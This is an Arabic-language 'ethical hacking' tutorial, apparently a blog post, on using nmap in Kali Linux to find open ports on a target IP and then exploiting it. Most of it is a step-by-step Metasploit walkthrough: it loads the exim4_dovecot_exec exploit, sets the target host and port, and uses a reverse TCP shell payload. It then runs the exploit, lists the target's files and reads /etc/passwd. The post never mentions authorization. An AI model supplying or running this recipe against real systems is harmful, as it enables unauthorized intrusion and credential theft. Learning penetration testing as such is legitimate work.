تعلم استخدام اداة Nmap على Kali Linux
تعلم كيفية استخدام اداة Nmap لعمل اختبار على موقعك وذلك لاكتشاف البورتات المفتوحة ومن ثم شرح مثال بسيط لكيفية استغلال تلك المعلومة
بسم الله الرحمن الرحيم
ان مادة الـEthical Haking تعد احد اهم المواد التي يجب تعلمها على كل من كان اهتمامه متعلق بمجال أمن المعلومات, حيث انها تحوي على عدد من الدروس التطبيقية والنظريات التي تعد حصاد سنين من خبراء امنية المعلومات.
يمكن للمبتدئين تعلم هذه المادة, حيث انها لا تشترط خبرات معقدة كتلك التي لدى المحترفين، وتهدف إلى بناء خبرة عملية في إختبار الإختراق من خلال تعلم استخدام توزيعة Kali Linux المخصصة للأمن والحماية.
ساقوم اليوم بشرح استخدام اداة Nmap والتي تعد واحدة من اهم ادوات Kali Linux التي تقوم باختبار جميع الـPorts الخاصة بالموقع الهدف وتحديد إيها متاح, حيث ان البورتات المفتوحة تعتبر الطريق الاول لدخول الهاكرز واختراق المواقع بها.
ان اول خطوة يجب علينا القيام بها هو معرفة عنوان الـIP الخاص بالموقع الذي سوف يتم اختبارة باستخدام الاداه. يمكنك استخدام موقع VirusTotal لمعرفة عنوان الـIP عن طريق اعطائه عنوان الـURL الخاص بالموقع الذي سوف يتم إختباره.
بعد الفحص نضغط على تبويب ادوات اضافية ومن ثم نقوم بنسخ عنوان الـIP.
الخطوة الثانية, قم بفتح الـTerminal بعد تشغيل Kali Linux ومن ثم قم بكتابة الأمر التالي
nmap -sS -sV 80.***.***.151
ان هذا الامر سوف يساعدنا على عرض جميع البورتات المفتوحة الخاصة بعنوان الـIP الهدف.
الخطوة الثالثة, نقوم بنسخ احد البورتات المتاحة
كما ترى يمكنك رؤية جميع البورتات المفتوحة في العنوان المحدد , والان سنتعلم قليلاً حول كيفية استخدام معلومة كهذه.
قم بفتح Terminal جديد ومن ثم كتابة الامر Msfconsole
ومن ثم قم بكتابة الامر التالي
Use exploit/linux/smtp/exim4_dovecot_exec
في الامر السابق قمنا بتحديد احد الـModels الخاصة بـMetasploit والتي تستخدم من اجل الاختراق عن طريق Msfconsole.
ثم قم بكتابة الامر التالي بحيث يتضمن عنوان الـIP الخاص بالهدف
set Rhost 80.***.***.151
بعد ذلك قم بتحديد الـPort الهدف الذي قمت باختيارة عبر الامر التالي
set Rport 578
بعد ذلك نقوم بكتابة الامر show payloads وذلك لعرض كل الـpayloads
بعد ذلك نقوم بكتابة الامر التالي
set payload generic/shell_reverse_tcp
تالياً قم بكتابة عنوان الـIP الخاص بالجهاز المحلي كالتالي
set Lhost 192.***.***.048
في البداية كتبنا set Rhost 80.***.***.151 وهذا يعتبر الطرف الايمن والذي سيتم اختراقه ومن ثم قمنا بكتابة set Lhost 192.***.***.048 والذي يمثل الطرف الايسر الذي يقوم بالاختراق
والان بعد ما حددنا الاطراف سنقوم بالتنفيذ عن طريق كتابة الامر exploit
ثم نقوم بكتابة الامر ls -la وذلك لعرض قائمة الملفات الخاصة بالهدف
ثم قم بكتابة الامر Cat /etc/passwd
هكذا قمنا بفتح محتوى ملف الـpasswd الخاص بالهدف والذي يحوي على معلومات المستخدمين ومن ضمنها كلمات المرور ولكنها مشفرة.
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !